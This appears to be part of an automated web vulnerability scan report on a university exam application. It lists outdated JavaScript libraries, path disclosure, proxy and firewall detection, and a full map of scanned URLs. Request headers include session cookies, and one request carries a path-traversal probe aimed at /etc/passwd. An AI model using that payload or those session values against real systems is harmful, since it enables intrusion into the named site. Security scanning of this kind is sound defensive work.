URL: http://dev-ubk.polindra.ac.id/assets/dist/auth/vendor/select2/select2.min.js
Detection method: The library's name and version were determined based on the file's contents.
References:
https://github.com/select2/select2/tags

Request headers

46
GET /assets/dist/auth/vendor/select2/select2.min.js HTTP/1.1

Host: dev-ubk.polindra.ac.id

Pragma: no-cache

Cache-Control: no-cache

accept-language: en-US

accept: */*

cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2;
ci_session=3f9tr3v47igiu9sbroignqd22i3rm4c5

Referer: http://dev-ubk.polindra.ac.id/auth

Accept-Encoding: gzip,deflate,br

Connection: keep-alive

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/99.0.4844.0 Safari/537.36

Web Server
Details

moment.js 2.13.0
URL: http://dev-ubk.polindra.ac.id/assets/dist/auth/vendor/daterangepicker/moment.min.js
Detection method: The library's name and version were determined based on the file's contents.
References:
https://github.com/moment/moment/tags

Request headers

47
GET /assets/dist/auth/vendor/daterangepicker/moment.min.js HTTP/1.1

Host: dev-ubk.polindra.ac.id

Pragma: no-cache

Cache-Control: no-cache

accept-language: en-US

accept: */*

cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2;
ci_session=3f9tr3v47igiu9sbroignqd22i3rm4c5

Referer: http://dev-ubk.polindra.ac.id/auth

Accept-Encoding: gzip,deflate,br

Connection: keep-alive

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/99.0.4844.0 Safari/537.36

Web Server
Details

bootstrap.js 4.0.0-beta
URL: http://dev-ubk.polindra.ac.id/assets/dist/auth/vendor/bootstrap/js/bootstrap.min.js
Detection method: The library's name and version were determined based on the file's contents.
References:
https://github.com/twbs/bootstrap/releases

Request headers

48
GET /assets/dist/auth/vendor/bootstrap/js/bootstrap.min.js HTTP/1.1

Host: dev-ubk.polindra.ac.id

Pragma: no-cache

Cache-Control: no-cache

accept-language: en-US

accept: */*

cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2;
ci_session=3f9tr3v47igiu9sbroignqd22i3rm4c5

Referer: http://dev-ubk.polindra.ac.id/auth

Accept-Encoding: gzip,deflate,br

Connection: keep-alive

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/99.0.4844.0 Safari/537.36

Web Server
Details

Select2 4.0.6-rc.1
URL: http://dev-ubk.polindra.ac.id/assets/bower_components/select2/js/select2.full.min.js
Detection method: The library's name and version were determined based on the file's contents.
References:
https://github.com/select2/select2/tags

Request headers

49
GET /assets/bower_components/select2/js/select2.full.min.js HTTP/1.1

Host: dev-ubk.polindra.ac.id

Pragma: no-cache

Cache-Control: no-cache

accept-language: en-US

accept: */*

cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2;
ci_session=lo6jkenpsbkc3nfjivejeg4hte020chk

Referer: http://dev-ubk.polindra.ac.id/dashboard

Accept-Encoding: gzip,deflate,br

Connection: keep-alive

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/99.0.4844.0 Safari/537.36

Web Server
Details

DataTables 1.5.6
URL: http://dev-ubk.polindra.ac.id/assets/bower_components/datatables.net-bs/plugins/Buttons-
1.5.6/js/dataTables.buttons.min.js
Detection method: The library's name and version were determined based on the file's contents.
References:
https://github.com/DataTables/DataTables/tags

Request headers

50
GET /assets/bower_components/datatables.net-bs/plugins/Buttons-
1.5.6/js/dataTables.buttons.min.js HTTP/1.1

Host: dev-ubk.polindra.ac.id

Pragma: no-cache

Cache-Control: no-cache

accept-language: en-US

accept: */*

cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2;
ci_session=lo6jkenpsbkc3nfjivejeg4hte020chk

Referer: http://dev-ubk.polindra.ac.id/dashboard

Accept-Encoding: gzip,deflate,br

Connection: keep-alive

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/99.0.4844.0 Safari/537.36

Web Server
Details

DataTables 1.10.19
URL: http://dev-ubk.polindra.ac.id/assets/bower_components/datatables.net-bs/js/jquery.dataTables.min.js
Detection method: The library's name and version were determined based on the file's contents.
References:
https://github.com/DataTables/DataTables/tags

Request headers

51
GET /assets/bower_components/datatables.net-bs/js/jquery.dataTables.min.js HTTP/1.1

Host: dev-ubk.polindra.ac.id

Pragma: no-cache

Cache-Control: no-cache

accept-language: en-US

accept: */*

cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2;
ci_session=lo6jkenpsbkc3nfjivejeg4hte020chk

Referer: http://dev-ubk.polindra.ac.id/dashboard

Accept-Encoding: gzip,deflate,br

Connection: keep-alive

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/99.0.4844.0 Safari/537.36

Possible server path disclosure (Unix)

Severity Informational
Reported by module /httpdata/text_search.js

Description

One or more fully qualified path names were found. From this information the attacker may learn the file system structure
from the web server. This information can be used to conduct further attacks.

This alert may be a false positive, manual confirmation is required.

Impact

Possible sensitive information disclosure.

Recommendation

Prevent this information from being displayed to the user.

References

Full Path Disclosure (https://www.owasp.org/index.php/Full_Path_Disclosure)

Affected items

Web Server
Details

52
Pages with paths being disclosed:

http://dev-ubk.polindra.ac.id/auth
/www/wwwroot/dev
http://dev-ubk.polindra.ac.id/ujian/master
/www/wwwroot/dev
http://dev-ubk.polindra.ac.id/soal/import
/www/wwwroot/dev
http://dev-ubk.polindra.ac.id/soal/preview/soal
/www/wwwroot/dev
http://dev-ubk.polindra.ac.id/users/edit/
/www/wwwroot/dev
http://dev-ubk.polindra.ac.id/ujian/add
/www/wwwroot/dev
http://dev-ubk.polindra.ac.id/soal/preview/
/www/wwwroot/dev
http://dev-ubk.polindra.ac.id/soal/preview
/www/wwwroot/dev
http://dev-ubk.polindra.ac.id/soal/save
/www/wwwroot/dev

Request headers
GET /auth HTTP/1.1

Host: dev-ubk.polindra.ac.id

Pragma: no-cache

Cache-Control: no-cache

upgrade-insecure-requests: 1

accept-language: en-US

accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/
*;q=0.8,application/signed-exchange;v=b3;q=0.9

cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2;
ci_session=3f9tr3v47igiu9sbroignqd22i3rm4c5

Accept-Encoding: gzip,deflate,br

Connection: keep-alive

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/99.0.4844.0 Safari/537.36

Reverse proxy detected

Severity Informational
Reported by module /target/RevProxy_Detection.js

Description

53
This server uses a reverse proxy, a load balancer or a CDN (Content Delivery Network) or it's hosted in a cloud provider.
Acunetix detected this by sending various payloads and detecting changes in headers and body.

Impact

No impact is associated with this vulnerability.

Recommendation

None

Affected items

Web Server
Details
Detected reverse proxy: Apache httpd
Request headers
GET /dashboard HTTP/1.1

Max-Forwards: 0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/99.0.4844.0 Safari/537.36

Host: dev-ubk.polindra.ac.id

Connection: Keep-alive

Web Application Firewall detected

Severity Informational
Reported by module /Scripts/PerServer/WAF_Detection.script

Description

This server is protected by an IPS (Intrusion Prevention System), IDS (Intrusion Detection System) or an WAF (Web
Application Firewall). Acunetix detected this by sending various malicious payloads and detecting changes in the response
code, headers and body.

Impact

You may receive incorrect/incomplete results when scanning a server protected by an IPS/IDS/WAF. Also, if the WAF
detects a number of attacks coming from the scanner, the IP address can be blocked after a few attempts.

Recommendation

If possible, it's recommended to scan an internal (development) version of the web application where the WAF is not active.

Affected items

54
Web Server
Details
Detected WatchGuard from the response body.
Request headers
GET /dashboard?page=../../../../../../../../../etc/passwd%00.jpg HTTP/1.1

Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2;
ci_session=lo6jkenpsbkc3nfjivejeg4hte020chk

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/99.0.4844.0 Safari/537.36

Host: dev-ubk.polindra.ac.id

Connection: Keep-alive

55
Scanned items (coverage report)
http://dev-ubk.polindra.ac.id/
http://dev-ubk.polindra.ac.id/assets/
http://dev-ubk.polindra.ac.id/assets/bower_components/
http://dev-ubk.polindra.ac.id/assets/bower_components/bootstrap-datetimepicker/
http://dev-ubk.polindra.ac.id/assets/bower_components/bootstrap-datetimepicker/bootstrap-datetimepicker.min.css
http://dev-ubk.polindra.ac.id/assets/bower_components/bootstrap-datetimepicker/bootstrap-datetimepicker.min.js
http://dev-ubk.polindra.ac.id/assets/bower_components/bootstrap/
http://dev-ubk.polindra.ac.id/assets/bower_components/bootstrap/dist/
http://dev-ubk.polindra.ac.id/assets/bower_components/bootstrap/dist/css/
http://dev-ubk.polindra.ac.id/assets/bower_components/bootstrap/dist/css/bootstrap.min.css
http://dev-ubk.polindra.ac.id/assets/bower_components/bootstrap/dist/fonts/
http://dev-ubk.polindra.ac.id/assets/bower_components/bootstrap/dist/js/
http://dev-ubk.polindra.ac.id/assets/bower_components/bootstrap/dist/js/bootstrap.min.js
http://dev-ubk.polindra.ac.id/assets/bower_components/bootstrap/fonts/
http://dev-ubk.polindra.ac.id/assets/bower_components/codemirror/
http://dev-ubk.polindra.ac.id/assets/bower_components/codemirror/lib/
http://dev-ubk.polindra.ac.id/assets/bower_components/codemirror/lib/codemirror.min.css
http://dev-ubk.polindra.ac.id/assets/bower_components/codemirror/lib/codemirror.min.js
http://dev-ubk.polindra.ac.id/assets/bower_components/codemirror/mode/
http://dev-ubk.polindra.ac.id/assets/bower_components/codemirror/mode/xml.min.js
http://dev-ubk.polindra.ac.id/assets/bower_components/datatables.net-bs/
http://dev-ubk.polindra.ac.id/assets/bower_components/datatables.net-bs/css/
http://dev-ubk.polindra.ac.id/assets/bower_components/datatables.net-bs/css/dataTables.bootstrap.min.css
http://dev-ubk.polindra.ac.id/assets/bower_components/datatables.net-bs/js/
http://dev-ubk.polindra.ac.id/assets/bower_components/datatables.net-bs/js/dataTables.bootstrap.min.js
http://dev-ubk.polindra.ac.id/assets/bower_components/datatables.net-bs/js/jquery.dataTables.min.js
http://dev-ubk.polindra.ac.id/assets/bower_components/datatables.net-bs/plugins/
http://dev-ubk.polindra.ac.id/assets/bower_components/datatables.net-bs/plugins/Buttons-1.5.6/
http://dev-ubk.polindra.ac.id/assets/bower_components/datatables.net-bs/plugins/Buttons-1.5.6/css/
http://dev-ubk.polindra.ac.id/assets/bower_components/datatables.net-bs/plugins/Buttons-
1.5.6/css/buttons.bootstrap.min.css
http://dev-ubk.polindra.ac.id/assets/bower_components/datatables.net-bs/plugins/Buttons-1.5.6/js/
http://dev-ubk.polindra.ac.id/assets/bower_components/datatables.net-bs/plugins/Buttons-1.5.6/js/buttons.bootstrap.min.js
http://dev-ubk.polindra.ac.id/assets/bower_components/datatables.net-bs/plugins/Buttons-1.5.6/js/buttons.colVis.min.js
http://dev-ubk.polindra.ac.id/assets/bower_components/datatables.net-bs/plugins/Buttons-1.5.6/js/buttons.html5.min.js
http://dev-ubk.polindra.ac.id/assets/bower_components/datatables.net-bs/plugins/Buttons-1.5.6/js/buttons.print.min.js
http://dev-ubk.polindra.ac.id/assets/bower_components/datatables.net-bs/plugins/Buttons-
1.5.6/js/dataTables.buttons.min.js
http://dev-ubk.polindra.ac.id/assets/bower_components/datatables.net-bs/plugins/JSZip-2.5.0/
http://dev-ubk.polindra.ac.id/assets/bower_components/datatables.net-bs/plugins/JSZip-2.5.0/jszip.min.js
http://dev-ubk.polindra.ac.id/assets/bower_components/datatables.net-bs/plugins/pdfmake-0.1.36/
http://dev-ubk.polindra.ac.id/assets/bower_components/datatables.net-bs/plugins/pdfmake-0.1.36/pdfmake.min.js
http://dev-ubk.polindra.ac.id/assets/bower_components/datatables.net-bs/plugins/pdfmake-0.1.36/vfs_fonts.js
http://dev-ubk.polindra.ac.id/assets/bower_components/font-awesome/
http://dev-ubk.polindra.ac.id/assets/bower_components/font-awesome/css/
http://dev-ubk.polindra.ac.id/assets/bower_components/font-awesome/css/font-awesome.min.css
http://dev-ubk.polindra.ac.id/assets/bower_components/font-awesome/fonts/
http://dev-ubk.polindra.ac.id/assets/bower_components/froala_editor
http://dev-ubk.polindra.ac.id/assets/bower_components/froala_editor/
http://dev-ubk.polindra.ac.id/assets/bower_components/froala_editor/css/
http://dev-ubk.polindra.ac.id/assets/bower_components/froala_editor/css/froala_editor.pkgd.min.css
http://dev-ubk.polindra.ac.id/assets/bower_components/froala_editor/css/froala_style.min.css
http://dev-ubk.polindra.ac.id/assets/bower_components/froala_editor/css/plugins/
http://dev-ubk.polindra.ac.id/assets/bower_components/froala_editor/css/themes/
http://dev-ubk.polindra.ac.id/assets/bower_components/froala_editor/css/themes/royal.min.css
http://dev-ubk.polindra.ac.id/assets/bower_components/froala_editor/js/
http://dev-ubk.polindra.ac.id/assets/bower_components/froala_editor/js/froala_editor.pkgd.min.js
http://dev-ubk.polindra.ac.id/assets/bower_components/froala_editor/js/languages/

56
http://dev-ubk.polindra.ac.id/assets/bower_components/froala_editor/js/plugins/
http://dev-ubk.polindra.ac.id/assets/bower_components/jquery/
http://dev-ubk.polindra.ac.id/assets/bower_components/jquery/jquery-3.3.1.min.js
http://dev-ubk.polindra.ac.id/assets/bower_components/moment/
http://dev-ubk.polindra.ac.id/assets/bower_components/moment/min/
http://dev-ubk.polindra.ac.id/assets/bower_components/moment/min/moment.min.js
http://dev-ubk.polindra.ac.id/assets/bower_components/moment/src/
http://dev-ubk.polindra.ac.id/assets/bower_components/moment/src/lib/
http://dev-ubk.polindra.ac.id/assets/bower_components/moment/templates/
http://dev-ubk.polindra.ac.id/assets/bower_components/pace/
http://dev-ubk.polindra.ac.id/assets/bower_components/pace/pace-theme-flash.css
http://dev-ubk.polindra.ac.id/assets/bower_components/pace/pace.min.js
http://dev-ubk.polindra.ac.id/assets/bower_components/select2/
http://dev-ubk.polindra.ac.id/assets/bower_components/select2/css/
http://dev-ubk.polindra.ac.id/assets/bower_components/select2/css/select2.min.css
http://dev-ubk.polindra.ac.id/assets/bower_components/select2/js/
http://dev-ubk.polindra.ac.id/assets/bower_components/select2/js/select2.full.min.js
http://dev-ubk.polindra.ac.id/assets/bower_components/sweetalert2/
http://dev-ubk.polindra.ac.id/assets/bower_components/sweetalert2/sweetalert2.all.min.js
http://dev-ubk.polindra.ac.id/assets/dist/
http://dev-ubk.polindra.ac.id/assets/dist/auth/
http://dev-ubk.polindra.ac.id/assets/dist/auth/css/
http://dev-ubk.polindra.ac.id/assets/dist/auth/css/main.css
http://dev-ubk.polindra.ac.id/assets/dist/auth/css/util.css
http://dev-ubk.polindra.ac.id/assets/dist/auth/fonts/
http://dev-ubk.polindra.ac.id/assets/dist/auth/fonts/font-awesome-4.7.0/
http://dev-ubk.polindra.ac.id/assets/dist/auth/fonts/font-awesome-4.7.0/css/
http://dev-ubk.polindra.ac.id/assets/dist/auth/fonts/font-awesome-4.7.0/css/font-awesome.min.css
http://dev-ubk.polindra.ac.id/assets/dist/auth/fonts/font-awesome-4.7.0/fonts/
http://dev-ubk.polindra.ac.id/assets/dist/auth/fonts/Linearicons-Free-v1.0.0/
http://dev-ubk.polindra.ac.id/assets/dist/auth/fonts/Linearicons-Free-v1.0.0/icon-font.min.css
http://dev-ubk.polindra.ac.id/assets/dist/auth/fonts/OpenSans/
http://dev-ubk.polindra.ac.id/assets/dist/auth/js/
http://dev-ubk.polindra.ac.id/assets/dist/auth/js/main.js
http://dev-ubk.polindra.ac.id/assets/dist/auth/vendor/
http://dev-ubk.polindra.ac.id/assets/dist/auth/vendor/animate/
http://dev-ubk.polindra.ac.id/assets/dist/auth/vendor/animate/animate.css
http://dev-ubk.polindra.ac.id/assets/dist/auth/vendor/animsition/
http://dev-ubk.polindra.ac.id/assets/dist/auth/vendor/animsition/css/
http://dev-ubk.polindra.ac.id/assets/dist/auth/vendor/animsition/css/animsition.min.css
http://dev-ubk.polindra.ac.id/assets/dist/auth/vendor/animsition/js/
http://dev-ubk.polindra.ac.id/assets/dist/auth/vendor/animsition/js/animsition.min.js
http://dev-ubk.polindra.ac.id/assets/dist/auth/vendor/bootstrap/
http://dev-ubk.polindra.ac.id/assets/dist/auth/vendor/bootstrap/css/
http://dev-ubk.polindra.ac.id/assets/dist/auth/vendor/bootstrap/css/bootstrap.min.css
http://dev-ubk.polindra.ac.id/assets/dist/auth/vendor/bootstrap/js/
http://dev-ubk.polindra.ac.id/assets/dist/auth/vendor/bootstrap/js/bootstrap.min.js
http://dev-ubk.polindra.ac.id/assets/dist/auth/vendor/bootstrap/js/popper.js
http://dev-ubk.polindra.ac.id/assets/dist/auth/vendor/countdowntime/
http://dev-ubk.polindra.ac.id/assets/dist/auth/vendor/countdowntime/countdowntime.js
http://dev-ubk.polindra.ac.id/assets/dist/auth/vendor/css-hamburgers/
http://dev-ubk.polindra.ac.id/assets/dist/auth/vendor/css-hamburgers/hamburgers.min.css
http://dev-ubk.polindra.ac.id/assets/dist/auth/vendor/daterangepicker/
http://dev-ubk.polindra.ac.id/assets/dist/auth/vendor/daterangepicker/daterangepicker.css
http://dev-ubk.polindra.ac.id/assets/dist/auth/vendor/daterangepicker/daterangepicker.js
http://dev-ubk.polindra.ac.id/assets/dist/auth/vendor/daterangepicker/moment.min.js
http://dev-ubk.polindra.ac.id/assets/dist/auth/vendor/jquery/
http://dev-ubk.polindra.ac.id/assets/dist/auth/vendor/jquery/jquery-3.2.1.min.js
http://dev-ubk.polindra.ac.id/assets/dist/auth/vendor/select2/
http://dev-ubk.polindra.ac.id/assets/dist/auth/vendor/select2/select2.min.css
http://dev-ubk.polindra.ac.id/assets/dist/auth/vendor/select2/select2.min.js

57
http://dev-ubk.polindra.ac.id/assets/dist/css/
http://dev-ubk.polindra.ac.id/assets/dist/css/AdminLTE.min.css
http://dev-ubk.polindra.ac.id/assets/dist/css/mystyle.css
http://dev-ubk.polindra.ac.id/assets/dist/css/skins/
http://dev-ubk.polindra.ac.id/assets/dist/css/skins/skin-purple.min.css
http://dev-ubk.polindra.ac.id/assets/dist/img/
http://dev-ubk.polindra.ac.id/assets/dist/js/
http://dev-ubk.polindra.ac.id/assets/dist/js/adminlte.min.js
http://dev-ubk.polindra.ac.id/assets/dist/js/app/
http://dev-ubk.polindra.ac.id/assets/dist/js/app/auth/
http://dev-ubk.polindra.ac.id/assets/dist/js/app/auth/login.js
http://dev-ubk.polindra.ac.id/assets/dist/js/app/dashboard.js
http://dev-ubk.polindra.ac.id/assets/dist/js/app/master/
http://dev-ubk.polindra.ac.id/assets/dist/js/app/master/dosen/
http://dev-ubk.polindra.ac.id/assets/dist/js/app/master/dosen/add.js
http://dev-ubk.polindra.ac.id/assets/dist/js/app/master/dosen/data.js
http://dev-ubk.polindra.ac.id/assets/dist/js/app/master/jurusan/
http://dev-ubk.polindra.ac.id/assets/dist/js/app/master/jurusan/add.js
http://dev-ubk.polindra.ac.id/assets/dist/js/app/master/jurusan/data.js
http://dev-ubk.polindra.ac.id/assets/dist/js/app/master/kelas/
http://dev-ubk.polindra.ac.id/assets/dist/js/app/master/kelas/add.js
http://dev-ubk.polindra.ac.id/assets/dist/js/app/master/kelas/data.js
http://dev-ubk.polindra.ac.id/assets/dist/js/app/master/mahasiswa/
http://dev-ubk.polindra.ac.id/assets/dist/js/app/master/mahasiswa/data.js
http://dev-ubk.polindra.ac.id/assets/dist/js/app/relasi/
http://dev-ubk.polindra.ac.id/assets/dist/js/app/relasi/kelasdosen/
http://dev-ubk.polindra.ac.id/assets/dist/js/app/relasi/kelasdosen/add.js
http://dev-ubk.polindra.ac.id/assets/dist/js/app/relasi/kelasdosen/data.js
http://dev-ubk.polindra.ac.id/assets/dist/js/app/soal/
http://dev-ubk.polindra.ac.id/assets/dist/js/app/soal/data.js
http://dev-ubk.polindra.ac.id/assets/dist/js/app/ujian/
http://dev-ubk.polindra.ac.id/assets/dist/js/app/ujian/add.js
http://dev-ubk.polindra.ac.id/assets/dist/js/app/ujian/data.js
http://dev-ubk.polindra.ac.id/assets/dist/js/app/ujian/hasil.js
http://dev-ubk.polindra.ac.id/assets/dist/js/app/users/
http://dev-ubk.polindra.ac.id/assets/dist/js/app/users/data.js
http://dev-ubk.polindra.ac.id/assets/dist/js/app/users/edit.js
http://dev-ubk.polindra.ac.id/assets/plugins/
http://dev-ubk.polindra.ac.id/auth
http://dev-ubk.polindra.ac.id/auth/
http://dev-ubk.polindra.ac.id/auth/cek_login
http://dev-ubk.polindra.ac.id/composer.json
http://dev-ubk.polindra.ac.id/composer.lock
http://dev-ubk.polindra.ac.id/dashboard/
http://dev-ubk.polindra.ac.id/dashboard/hasil_ujian
http://dev-ubk.polindra.ac.id/dosen
http://dev-ubk.polindra.ac.id/dosen/
http://dev-ubk.polindra.ac.id/dosen/add
http://dev-ubk.polindra.ac.id/dosen/delete
http://dev-ubk.polindra.ac.id/dosen/import
http://dev-ubk.polindra.ac.id/dosen/preview
http://dev-ubk.polindra.ac.id/dosen/save
http://dev-ubk.polindra.ac.id/hasilujian
http://dev-ubk.polindra.ac.id/index.php
http://dev-ubk.polindra.ac.id/jurusan
http://dev-ubk.polindra.ac.id/jurusan/
http://dev-ubk.polindra.ac.id/jurusan/add
http://dev-ubk.polindra.ac.id/jurusan/import
http://dev-ubk.polindra.ac.id/jurusan/preview
http://dev-ubk.polindra.ac.id/jurusan/save
http://dev-ubk.polindra.ac.id/kelas

58
http://dev-ubk.polindra.ac.id/kelas/
http://dev-ubk.polindra.ac.id/kelas/add
http://dev-ubk.polindra.ac.id/kelas/import
http://dev-ubk.polindra.ac.id/kelas/preview
http://dev-ubk.polindra.ac.id/kelas/save
http://dev-ubk.polindra.ac.id/kelasdosen
http://dev-ubk.polindra.ac.id/kelasdosen/
http://dev-ubk.polindra.ac.id/kelasdosen/add
http://dev-ubk.polindra.ac.id/kelasdosen/save
http://dev-ubk.polindra.ac.id/mahasiswa
http://dev-ubk.polindra.ac.id/mahasiswa/
http://dev-ubk.polindra.ac.id/mahasiswa/delete
http://dev-ubk.polindra.ac.id/mahasiswa/import
http://dev-ubk.polindra.ac.id/mahasiswa/preview
http://dev-ubk.polindra.ac.id/script/
http://dev-ubk.polindra.ac.id/settings
http://dev-ubk.polindra.ac.id/settings/
http://dev-ubk.polindra.ac.id/settings/truncate
http://dev-ubk.polindra.ac.id/soal
http://dev-ubk.polindra.ac.id/soal/
http://dev-ubk.polindra.ac.id/soal/add
http://dev-ubk.polindra.ac.id/soal/data
http://dev-ubk.polindra.ac.id/soal/delete
http://dev-ubk.polindra.ac.id/soal/import
http://dev-ubk.polindra.ac.id/soal/preview
http://dev-ubk.polindra.ac.id/soal/preview/
http://dev-ubk.polindra.ac.id/soal/preview/soal
http://dev-ubk.polindra.ac.id/soal/save
http://dev-ubk.polindra.ac.id/ujian/
http://dev-ubk.polindra.ac.id/ujian/add
http://dev-ubk.polindra.ac.id/ujian/delete
http://dev-ubk.polindra.ac.id/ujian/master
http://dev-ubk.polindra.ac.id/ujian/save
http://dev-ubk.polindra.ac.id/uploads/
http://dev-ubk.polindra.ac.id/uploads/import/
http://dev-ubk.polindra.ac.id/uploads/import/format/
http://dev-ubk.polindra.ac.id/users
http://dev-ubk.polindra.ac.id/users/
http://dev-ubk.polindra.ac.id/users/change_password
